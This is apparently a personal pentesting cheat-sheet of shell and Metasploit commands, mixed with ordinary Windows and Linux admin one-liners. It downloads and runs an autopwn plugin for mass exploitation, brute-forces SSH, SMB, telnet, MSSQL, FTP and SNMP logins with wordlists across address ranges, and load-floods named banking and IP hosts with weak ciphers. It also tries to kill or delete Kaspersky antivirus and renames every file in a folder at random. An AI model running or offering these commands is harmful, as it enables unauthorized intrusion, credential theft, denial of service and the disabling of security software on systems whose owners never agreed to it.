
# ubuntu autopwn
apt-get install  ruby1.8-dev libpq-dev postgresql -y
gem install postgres


# download autopwn .
cd /pentest/exploits/framework/plugins/
wget http://rmccurdy.com/scripts/db_autopwn.rb
cd ..


sudo -u postgres psql
\password postgres
\q


sudo -u postgres createdb   msf

./msfconsole

db_driver
db_driver postgresql
db_connect postgres:postgres@127.0.0.1/msf
db_nmap 123.123.123.123 -v -v -v -v
load db_autopwn
db_autpown -p -t -e


# ssh logins
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.1-255
set USER_FILE "C:/wordlist/password_small.txt"
run


back

#smb
use auxiliary/scanner/smb/smb_login
set RHOSTS 127.0.0.1
set SMBUser Administrator
set PASS_FILE "C:/wordlist/password_small.txt"
set VERBOSE false
set THREADS 16
run


back

# telnet
use auxiliary/scanner/telnet/telnet_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/password_small.txt"
set THREADS 254
run


back


# mssql
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/password_small.txt"
set USERNAME sa
run


back


#ftp
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/password_small.txt"
run


#snmp
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
run


User Summary

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
Example Usage

nmap -sV -sC <target>

db_driver postgresql
db_connect postgres:"msf3:"32a771f6"@127.0.0.1:7175/msf3

http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=7558 Microsoft Baseline Security Analyzer 2.2 (for IT Professionals)

.a/gxfr.py kpmg.com  --dns-lookup -v -t 10


http stress test
.- HTTPS Support
- 1000 simultaneous connections (each one with a different user/password)
- Ability to record 2 or more application forms in order to test very specific application flows..

In order to answer your question, there.re some tools like:

Tool 1- httperf

More examples that I used before.

httperf --hog --server HOST --num-conn 1000 --ra 100 --timeout 5
httperf --hog --server 192.168.1.3 --num-conn 1000 --ra 100 --timeout 5
httperf --hog --server=192.168.1.3 --wsess=10,5,2 --rate 1 --timeout 5
httperf --hog --server=www --wsess=10,5,2 --rate=1 --timeout=5 --ssl
httperf  --hog  --server=bankinghome.es/apl/donativos/index_ca.html  --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5  --ssl-no-reuse --http-version=1.0
httperf  --hog  --server=17.148.71.129/index.html  --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5  --ssl-no-reuse --http-version=1.0
httperf  --hog  --server=http://17.148.71.129/index.html  --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5  --ssl-no-reuse --http-version=1.0

Tool 2- fakeconnect

fakeconnect -s SOURCE -d HOST -p PORT

Tool 3- Apache benchmarking tool (accept POST)

ab -n 100 -c 4 -p test.jpg http://localhost/
(http://httpd.apache.org/docs/2.0/programs/ab.html)

Tool 4- Curl-loader (it rocks, very customizable)

http://curl-loader.sourceforge.net/


And running hundreds and thousands of clients..., please, do not forget:

1- To increase limit of descriptors (sockets) by running e.g.

#ulimit -n 10000;

2- Optionally, to set reuse of sockets in time-wait state, etc.., by setting:

#echo 1 > /proc/sys/net/ipv4/tcp_tw_recycle and/or
#echo 1 > /proc/sys/net/ipv4/tcp_tw_reuse;
#echo 1 > /proc/sys/net/ipv4/tcp_moderate_rcvbuf
#echo 108544 > /proc/sys/net/core/wmem_max
#echo 108544 > /proc/sys/net/core/rmem_max
#echo "4096 87380 4194304" > /proc/sys/net/ipv4/tcp_rmem
#echo "4096 16384 4194304" > /proc/sys/net/ipv4/tcp_wmem

Additional info:

http://ltp.sourceforge.net/tooltable.php

Hope that help you.


==========


random file raname rename random file
IFS=$'\n';for fname in `ls`; do mv "$fname" $RANDOM$RANDOM ;done


grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' ips | sort | uniq


catchme.exe  -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -O "c:\Program Files\Kaspersky\avp.exe"
reboot
still looking into it .. can't kill it from memory yet I can delete the file


# file size search
FOR /R C:\ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi

# screen cron
@reboot /usr/bin/screen -fa -d -m -S torrent /usr/bin/rtorrent


# netstat with pid
for /f "tokens=1,2,3,7 delims=: " %a in ('netstat -nao ^| find ^"LISTENING^" ^| find /v ^"::^"') do @(for /f "tokens=1,*" %n in ('"wmic process where processId=%d get caption,executablepath | find ".""') do @echo Protocol=%a, IP=%b, Port=%c, PID=%d, Name=%n, Path=%o)


# CSV file size,file
for /r c:\ %i in (*) do @echo %~zi, %i

# md5 check but in linux style
md5 * | awk '{print $4,$2}' | sed 's/ (/ \*/g' | sed 's/)//g'


#################
# see ./fu_ripp.txt for ripped fu the size was getting out of hand ..
#################